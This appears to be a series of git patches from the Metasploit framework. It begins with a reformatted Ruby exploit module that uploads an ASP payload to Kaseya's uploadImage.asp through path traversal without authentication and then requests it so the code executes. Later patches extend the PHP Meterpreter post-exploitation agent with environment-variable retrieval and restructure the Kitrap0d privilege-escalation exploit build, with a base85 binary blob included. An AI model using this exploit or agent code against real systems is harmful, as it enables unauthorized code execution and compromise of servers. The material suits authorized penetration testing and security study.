-        Rank = ExcellentRanking
+  Rank = ExcellentRanking
 
-        include Msf::Exploit::Remote::HttpClient
-        include Msf::Exploit::EXE
-        include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
-        def initialize(info = {})
-                super(update_info(info,
-                        'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
-                        'Description'    => %q{
-                                        This module exploits an arbitrary file upload vulnerability found in Kaseya 6.3.0.0
-                                A malicious user can upload a file to an arbitrary directory without authentication, which can result in arbitrary code execution.
-Code executed in this manner runs under the IUSR account.
-                        },
-                        'Author'         =>
-                                [
-                                        'Thomas Hibbert' # cartel
-                                ],
-                        'License'        => MSF_LICENSE,
-                        'References'     => [['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']],
-                        'Payload'        => {},
-                        'Platform'       => 'win',
-                        'Arch'               => ARCH_X86,
-                        'Targets'        =>
-                                [
-                                 [ 'Kaseya KServer / Windows', {} ],
-                                ],
-                        'DefaultTarget'  => 0,
-                        'DisclosureDate' => 'Nov 18 2013'))
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
+      'Description'    => %q{
+        This module exploits an arbitrary file upload vulnerability found in Kaseya versions below 6.3.0.2.
+        A malicious user can upload an ASP file to an arbitrary directory without authentication, leading to arbitrary code execution.
+        Code executed in this manner runs under an IUSR account.
+      },
+      'Author'         =>
+        [
+                          'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     => [['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']],
+      'Payload'        => {},
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          [ 'Kaseya KServer / Windows', {} ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 11 2013'))
+  end
 
-                register_options(
-                        [
-                         Opt::RPORT(80), Opt::RHOST()
-                        ], self.class)
-        end
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri('SystemTab','uploadImage.asp')
+    })
+    
+    # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
 
-        def check
-                res = send_request_cgi({
-                        'method' => 'POST',
-                        'uri'    => normalize_uri('SystemTab','uploadImage.asp')
-                })
+    if not res or res.code != 500
+      return Exploit::Faliure::UnexpectedReply
+    end
 
-                if not res or res.code != 200
-                        return Exploit::CheckCode::Unknown
-                end
+    return Exploit::CheckCode::Appears
+  end
 
-                return Exploit::CheckCode::Appears
-        end
+  def get_cookie
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
+    })
 
-        def get_cookie
-          res = send_request_cgi({
-                                   'method' => 'GET',
-                                   'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
-                                 })
+    if res and res.headers['Set-Cookie']
+      cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
+    else
+      fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
+    end
 
-          if res and res.headers['Set-Cookie']
-            cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
-          else
-            fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
-          end
+    cookie
+  end
 
-          cookie
-        end
+  def exploit
+    peer = "#{rhost}:#{rport}"
 
-        def exploit
-          peer = "#{rhost}:#{rport}"
+    @payload_name = "#{rand_text_alpha_lower(8)}.asp"
+    exe  = generate_payload_exe
+    asp  = Msf::Util::EXE.to_exe_asp(exe)
 
-          @payload_name = "#{rand_text_alpha_lower(8)}.asp"
-          exe  = generate_payload_exe
-          asp  = Msf::Util::EXE.to_exe_asp(exe)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}")
 
-          post_data = Rex::MIME::Message.new
-          post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")
+    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
+    cookie = get_cookie
+    res = send_request_raw({
+      "method" => "POST",
+      "uri"    => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
+      "data"   => data,
+      "ctype"  => "multipart/form-data; boundary=#{post_data.bound}",
+      "cookie" => cookie
+    })
 
-          data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+    register_files_for_cleanup(@payload_name)
 
-          cookie = get_cookie
-          res = send_request_raw({
-                                   'method' => 'POST',
-                                   'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name),
-                                   'data'   => data,
-                                   'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-                                   'cookie' => cookie
-                                 })
+    if not res or res.code != 200
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
 
-          register_files_for_cleanup(@payload_name)
-
-          if not res or res.code != 200
-            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
-          end
-
-          print_status("#{peer} - Executing payload #{@payload_name}")
-          res = send_request_cgi({
-                                   'uri'    => normalize_uri(@payload_name),
-                                   'method' => 'GET'
-                                 })
-        end
-      end
+    print_status("#{peer} - Executing payload #{@payload_name}")
+    res = send_request_cgi({
+      'uri'    => normalize_uri(@payload_name),
+      'method' => 'GET'
+    })
+  end
+end

From a3337e5de536e96403214d191e7ffd35d8ba57ea Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Tue, 26 Nov 2013 23:16:28 -0600
Subject: [PATCH 104/217] Add PHP side for meterpreter getenv

---
 data/meterpreter/ext_server_stdapi.php | 173 +++++++++++++++----------
 data/meterpreter/meterpreter.php       |  64 ++++++---
 2 files changed, 154 insertions(+), 83 deletions(-)

diff --git a/data/meterpreter/ext_server_stdapi.php b/data/meterpreter/ext_server_stdapi.php
index 4a7df401e6..20cbc03793 100755
--- a/data/meterpreter/ext_server_stdapi.php
+++ b/data/meterpreter/ext_server_stdapi.php
@@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA",          TLV_META_TYPE_RAW     | 1012);
 define("TLV_TYPE_COMPUTER_NAME",       TLV_META_TYPE_STRING  | 1040);
 define("TLV_TYPE_OS_NAME",             TLV_META_TYPE_STRING  | 1041);
 define("TLV_TYPE_USER_NAME",           TLV_META_TYPE_STRING  | 1042);
+define("TLV_TYPE_ARCHITECTURE",        TLV_META_TYPE_STRING  | 1043);
+define("TLV_TYPE_LANG_SYSTEM",         TLV_META_TYPE_STRING  | 1044);
+
+# Environment
+define("TLV_TYPE_ENV_VARIABLE",        TLV_META_TYPE_STRING  | 1100);
+define("TLV_TYPE_ENV_VALUE",           TLV_META_TYPE_STRING  | 1101);
+define("TLV_TYPE_ENV_GROUP",           TLV_META_TYPE_GROUP   | 1102);
+
 
 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
 
@@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000);
 # eval'd twice
 my_print("Evaling stdapi");
 
-## 
+##
 # Search Helpers
 ##
 
@@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
  */
 if (!function_exists('safe_glob')) {
 function safe_glob($pattern, $flags=0) {
-	$split=explode('/',str_replace('\\','/',$pattern));
-	$mask=array_pop($split);
-	$path=implode('/',$split);
-	if (($dir=opendir($path))!==false) {
-		$glob=array();
-		while (($file=readdir($dir))!==false) {
-			// Recurse subdirectories (GLOB_RECURSE)
-			if ( 
-				(
-				 $flags&GLOB_RECURSE) && is_dir($path."/".$file) 
-   				 && (!in_array($file,array('.','..'))
-				 # don't follow links to avoid infinite recursion
-				 && (!is_link($path."/".$file))
-				)
-   			) {
-				$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
-							($flags&GLOB_PATH?'':$file.'/')));
+    $split=explode('/',str_replace('\\','/',$pattern));
+    $mask=array_pop($split);
+    $path=implode('/',$split);
+    if (($dir=opendir($path))!==false) {
+        $glob=array();
+        while (($file=readdir($dir))!==false) {
+            // Recurse subdirectories (GLOB_RECURSE)
+            if (
+                (
+                    $flags&GLOB_RECURSE) && is_dir($path."/".$file)
+                    && (!in_array($file,array('.','..'))
+                    # don't follow links to avoid infinite recursion
+                    && (!is_link($path."/".$file))
+                )
+            ) {
+                $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
+                    ($flags&GLOB_PATH?'':$file.'/')));
             }
-			// Match file mask
-			if (fnmatch($mask,$file)) {
-				if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
-						&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
-						&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
-					$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
-			}
-		}
-		closedir($dir);
-		if (!($flags&GLOB_NOSORT)) sort($glob);
-		return $glob;
-	} else {
-		return false;
-	}   
+            // Match file mask
+            if (fnmatch($mask,$file)) {
+                if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
+                    && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
+                    && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
+                    $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
+            }
+        }
+        closedir($dir);
+        if (!($flags&GLOB_NOSORT)) sort($glob);
+        return $glob;
+    } else {
+        return false;
+    }
 }
 }
 /**
@@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
  */
 if (!function_exists('fnmatch')) {
 function fnmatch($pattern, $string) {
-	return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
+    return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
 }
 }
 
@@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
         else
             $array[$key] = $string.$element;
     return $array;
-   
+
 }
 }
 
@@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
     $path = cononicalize_path($path_tlv['value']);
 
-		if (is_callable("md5_file")) {
-			$md5 = md5_file($path);
-		} else {
-			$md5 = md5(file_get_contents($path));
-		}
-		$md5 = pack("H*", $md5);
-		# Ghetto abuse of file name type to indicate the md5 result
+    if (is_callable("md5_file")) {
+        $md5 = md5_file($path);
+    } else {
+        $md5 = md5(file_get_contents($path));
+    }
+    $md5 = pack("H*", $md5);
+    # Ghetto abuse of file name type to indicate the md5 result
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
     return ERROR_SUCCESS;
 }
@@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
     $path = cononicalize_path($path_tlv['value']);
 
-		if (is_callable("sha1_file")) {
-			$sha1 = sha1_file($path);
-		} else {
-			$sha1 = sha1(file_get_contents($path));
-		}
-		$sha1 = pack("H*", $sha1);
-		# Ghetto abuse of file name type to indicate the sha1 result
+    if (is_callable("sha1_file")) {
+        $sha1 = sha1_file($path);
+    } else {
+        $sha1 = sha1(file_get_contents($path));
+    }
+    $sha1 = pack("H*", $sha1);
+    # Ghetto abuse of file name type to indicate the sha1 result
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
     return ERROR_SUCCESS;
 }
@@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
 }
 }
 
+if (!function_exists('stdapi_sys_config_getenv')) {
+register_command('stdapi_sys_config_getenv');
+function stdapi_sys_config_getenv($req, &$pkt) {
+    my_print("doing getenv");
+
+    $variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
+
+    # If we decide some day to have sys.config.getenv return all env
+    # vars when given an empty search list, this is one way to do it.
+    #if (empty($variable_tlvs)) {
+    #    # We don't have a var to look up, return all of 'em
+    #    $variables = array_keys($_SERVER);
+    #} else {
+    #    $variables = array();
+    #    foreach ($variable_tlvs as $tlv) {
+    #        array_push($variables, $tlv['value']);
+    #    }
+    #}
+
+    foreach ($variable_tlvs as $name) {
+        $canonical_name = str_replace(array("$","%"), "", $name['value']);
+        $env = getenv($canonical_name);
+        if ($env !== FALSE) {
+            $grp = "";
+            $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
+            $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
+            packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
+        }
+    }
+
+    return ERROR_SUCCESS;
+}
+}
+
+
 # Unimplemented becuase it's unimplementable
 #if (!function_exists('stdapi_sys_config_rev2self')) {
 #register_command('stdapi_sys_config_rev2self');
@@ -696,24 +739,24 @@ function close_process($proc) {
         foreach ($proc['pipes'] as $f) {
             @fclose($f);
         }
-		if (is_callable('proc_get_status')) {
-			$status = proc_get_status($proc['handle']);
-		} else {
-			# fake a running process on php < 4.3
-			$status = array('running' => true);
-		}
+        if (is_callable('proc_get_status')) {
+            $status = proc_get_status($proc['handle']);
+        } else {
+            # fake a running process on php < 4.3
+            $status = array('running' => true);
+        }
 
-		# proc_close blocks waiting for the child to exit, so if it's still
-		# running, don't take a chance on deadlock and just sigkill it if we
-		# can.  We can't on php < 4.3, so don't do anything.  This will leave
-		# zombie processes, but that's better than deadlock.
-		if ($status['running'] == false) {
-			proc_close($proc['handle']);
-		} else {
-			if (is_callable('proc_terminate')) {
-				proc_terminate($proc['handle'], 9);
-			}
-		}
+        # proc_close blocks waiting for the child to exit, so if it's still
+        # running, don't take a chance on deadlock and just sigkill it if we
+        # can.  We can't on php < 4.3, so don't do anything.  This will leave
+        # zombie processes, but that's better than deadlock.
+        if ($status['running'] == false) {
+            proc_close($proc['handle']);
+        } else {
+            if (is_callable('proc_terminate')) {
+                proc_terminate($proc['handle'], 9);
+            }
+        }
         if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
             unset($channel_process_map[$proc['cid']]);
         }
diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
index f378732436..c33885d901 100755
--- a/data/meterpreter/meterpreter.php
+++ b/data/meterpreter/meterpreter.php
@@ -680,6 +680,30 @@ function tlv_pack($tlv) {
     return $ret;
 }
 
+function tlv_unpack($raw_tlv) {
+    $tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
+    $type = $tlv['type'];
+    my_print("len: {$tlv['len']}, type: {$tlv['type']}");
+    if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
+        $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+    }
+    elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
+        $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
+    }
+    elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
+        $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
+    }
+    elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
+        $tlv = unpack("Nlen/Ntype", $raw_tlv);
+        $tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
+    }
+    else {
+        my_print("Wtf type is this? $type");
+        $tlv = null;
+    }
+    return $tlv;
+}
+
 function packet_add_tlv(&$pkt, $tlv) {
     $pkt .= tlv_pack($tlv);
 }
@@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
     # Start at offset 8 to skip past the packet header
     $offset = 8;
     while ($offset < strlen($pkt)) {
-        $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
+        $tlv = tlv_unpack(substr($pkt, $offset));
         #my_print("len: {$tlv['len']}, type: {$tlv['type']}");
         if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
             #my_print("Found one at offset $offset");
-            if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
-                $tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
-            }
-            elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
-                $tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
-            }
-            elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
-                $tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
-            }
-            elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
-                $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
-                $tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
-            }
-            else {
-                my_print("Wtf type is this? $type");
-                $tlv = null;
-            }
             return $tlv;
         }
         $offset += $tlv['len'];
@@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
 }
 
 
+function packet_get_all_tlvs($pkt, $type) {
+    my_print("Looking for all tlvs of type $type");
+    # Start at offset 8 to skip past the packet header
+    $offset = 8;
+    $all = array();
+    while ($offset < strlen($pkt)) {
+        $tlv = tlv_unpack(substr($pkt, $offset));
+        if ($tlv == NULL) {
+            break;
+        }
+        my_print("len: {$tlv['len']}, type: {$tlv['type']}");
+        if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
+            my_print("Found one at offset $offset");
+            array_push($all, $tlv);
+        }
+        $offset += $tlv['len'];
+    }
+    return $all;
+}
+
+
 ##
 # Functions for genericizing the stream/socket conundrum
 ##

From 468654d2b5ac5587bae45e7a5aafb2fbb0a79402 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 27 Nov 2013 16:04:41 +1000
Subject: [PATCH 105/217] Add RDI submodule, port Kitrap0d

This commit is the first in a series that will move all the exploits that use RDI
over to the R7 fork. The RDI source will be in a single known location and each
exploit will have to work from that location.

The kitrap0d exploit has been migrated over to use this submodule so that there's
one example of how it's done for future contributions to follow.
---
 .gitmodules                                   |   3 +
 external/source/ReflectiveDLLInjection        |   1 +
 .../source/ReflectiveDllInjection_v1.0.zip    | Bin 167590 -> 0 bytes
 .../CVE-2010-0232/common/GetProcAddressR.c    | 116 ----
 .../CVE-2010-0232/common/GetProcAddressR.h    |  36 --
 .../CVE-2010-0232/common/LoadLibraryR.c       | 233 -------
 .../CVE-2010-0232/common/LoadLibraryR.h       |  41 --
 .../common/ReflectiveDLLInjection.h           |  53 --
 .../CVE-2010-0232/common/ReflectiveLoader.c   | 599 ------------------
 .../CVE-2010-0232/common/ReflectiveLoader.h   | 223 -------
 .../CVE-2010-0232/kitrap0d/kitrap0d.c         |   4 +-
 .../CVE-2010-0232/kitrap0d/kitrap0d.vcxproj   |  14 +-
 .../kitrap0d/kitrap0d.vcxproj.filters         |  15 +-
 .../kitrap0d_payload/kitrap0d_payload.vcxproj |   4 +-
 .../CVE-2010-0232/kitrap0d_payload/main.c     |   2 +-
 .../exploits/CVE-2010-0232/make.msbuild       |  18 +
 external/source/exploits/make.bat             |  39 ++
 17 files changed, 84 insertions(+), 1317 deletions(-)
 create mode 100644 .gitmodules
 create mode 160000 external/source/ReflectiveDLLInjection
 delete mode 100644 external/source/ReflectiveDllInjection_v1.0.zip
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c
 delete mode 100644 external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h
 create mode 100755 external/source/exploits/CVE-2010-0232/make.msbuild
 create mode 100755 external/source/exploits/make.bat

diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000000..564edab544
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "external/source/ReflectiveDLLInjection"]
+	path = external/source/ReflectiveDLLInjection
+	url = https://github.com/rapid7/ReflectiveDLLInjection.git
diff --git a/external/source/ReflectiveDLLInjection b/external/source/ReflectiveDLLInjection
new file mode 160000
index 0000000000..88e8e5f109
--- /dev/null
+++ b/external/source/ReflectiveDLLInjection
@@ -0,0 +1 @@
+Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103
diff --git a/external/source/ReflectiveDllInjection_v1.0.zip b/external/source/ReflectiveDllInjection_v1.0.zip
deleted file mode 100644
index 883acde770b84770e728396f7fb96a2318b8f19b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 167590
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
